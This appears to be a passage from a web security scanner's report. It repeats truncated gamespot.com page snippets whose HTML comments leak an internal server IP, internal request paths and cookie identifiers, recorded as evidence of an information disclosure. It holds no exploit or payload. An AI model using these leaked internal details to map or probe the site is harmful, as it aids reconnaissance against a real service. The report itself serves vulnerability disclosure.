<!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=47/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=47%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13424/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=13424%3A/POS=100/PTYPE=6011/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13424/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=13424%3A/POS=100/PTYPE=6011/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13424/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=13424%3A/POS=100/PTYPE=6011/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13424/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=13424%3A/POS=200/PTYPE=6011/R ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13424/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=13424%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13424/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=13424%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13424/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=13424%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=13424/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=13424%3A/PAGESTATE=1%7C%7C%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=11479/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=11479%3A/POS=300/PTYPE=6643/REMOTE_ADDR=174.121.222.18/SITE=6/SP ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=11479/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=11479%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7C2708/POS=100/PTYPE=6643/RE ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=36%3A/POS=100/PTYPE=2001/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=36%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=36%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=36%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=36%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=36%3A23236%3A153%3A/PAGESTATE=1% ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=36%3A23236%3A153%3A/PAGESTATE=1% ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=36%3A23236%3A153%3A/PAGESTATE=1% ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=534914/DVAR_PUBLISHER=361/DVAR_GSESRB=T/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=534914/DVAR_PUBLISHER=361/DVAR_GSESRB=T/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=534914/DVAR_PUBLISHER=361/DVAR_GSESRB=T/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=534914/DVAR_PUBLISHER=361/DVAR_GSESRB=T/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPL ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=925735/DVAR_PUBLISHER=44/DVAR_GSESRB=T/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPLA ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=925735/DVAR_PUBLISHER=44/DVAR_GSESRB=T/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPLA ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=36/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=925735/DVAR_PUBLISHER=44/DVAR_GSESRB=T/DVAR_GSDISTRIB=Retail/DVAR_GSMULTIPLA ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=561545/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=561545/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=561545/DVAR_PUBLISHER=13111/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=914983/DVAR_PUBLISHER=13111/DVAR_GSESRB=AO/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=914983/DVAR_PUBLISHER=13111/DVAR_GSESRB=AO/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=914983/DVAR_PUBLISHER=13111/DVAR_GSESRB=AO/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=914983/DVAR_PUBLISHER=13111/DVAR_GSESRB=AO/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=4359%3A/POS=100/PTYPE=2001/REM ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=4359%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=4359%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=4359%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=4359%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=4359%3A23236%3A250%3A/PAGESTAT ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=4359%3A23236%3A250%3A/PAGESTAT ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=4359/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=4359%3A23236%3A250%3A/PAGESTAT ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10918/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=996092/DVAR_PUBLISHER=2175/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10918/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=996092/DVAR_PUBLISHER=2175/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10918/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=996092/DVAR_PUBLISHER=2175/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10918/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=996092/DVAR_PUBLISHER=2175/DVAR_GSESRB=M/DVAR_GSDISTRIB=Retail/DVAR_GSMUL ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10918/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=941103/DVAR_PUBLISHER=10631/DVAR_GSESRB=E/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10918/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=941103/DVAR_PUBLISHER=10631/DVAR_GSESRB=E/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10918/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=941103/DVAR_PUBLISHER=10631/DVAR_GSESRB=E/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=10918/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_GAMEID=941103/DVAR_PUBLISHER=10631/DVAR_GSESRB=E/DVAR_GSDISTRIB=Retail/DVAR_GSMU ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9136/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9136%3A/POS=100/PTYPE=2001/REM ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9136/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9136%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9136/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9136%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9136/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9136%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9136/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9136%3A/PAGESTATE=1%7C%7C%3B%3 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9136/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9136%3A23351%3A73%3A/PAGESTATE ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9136/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9136%3A23351%3A73%3A/PAGESTATE ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=9136/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=9136%3A23351%3A73%3A/PAGESTATE ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/POS=300/PTYPE=6048/REMOTE_ ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=39/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=39%3A/PAGESTATE=1%7C%7C%3B%3B%3B ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=5/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=5%3A/POS=100/PTYPE=6056/REMOTE_AD ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=5/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=5%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET /html/BRAND=4/CELT=html/CLIENT:ID=CHEETAH/CNET%2dONTOLOGY%2dNODE%2dID=5/COOKIE:ANON_ID=Cg8IMEzjGeJNAAAAqCw/DVAR_FIRSTPAGE=1/HTTP_HOST=www.gamespot.com/HUB=cn/NCAT=5%3A/PAGESTATE=1%7C%7C%3B%3B%3B%7 ...[SNIP]... <!-- php client madison [r20100518-1348-Metacritic]: 10.15.4.104 GET 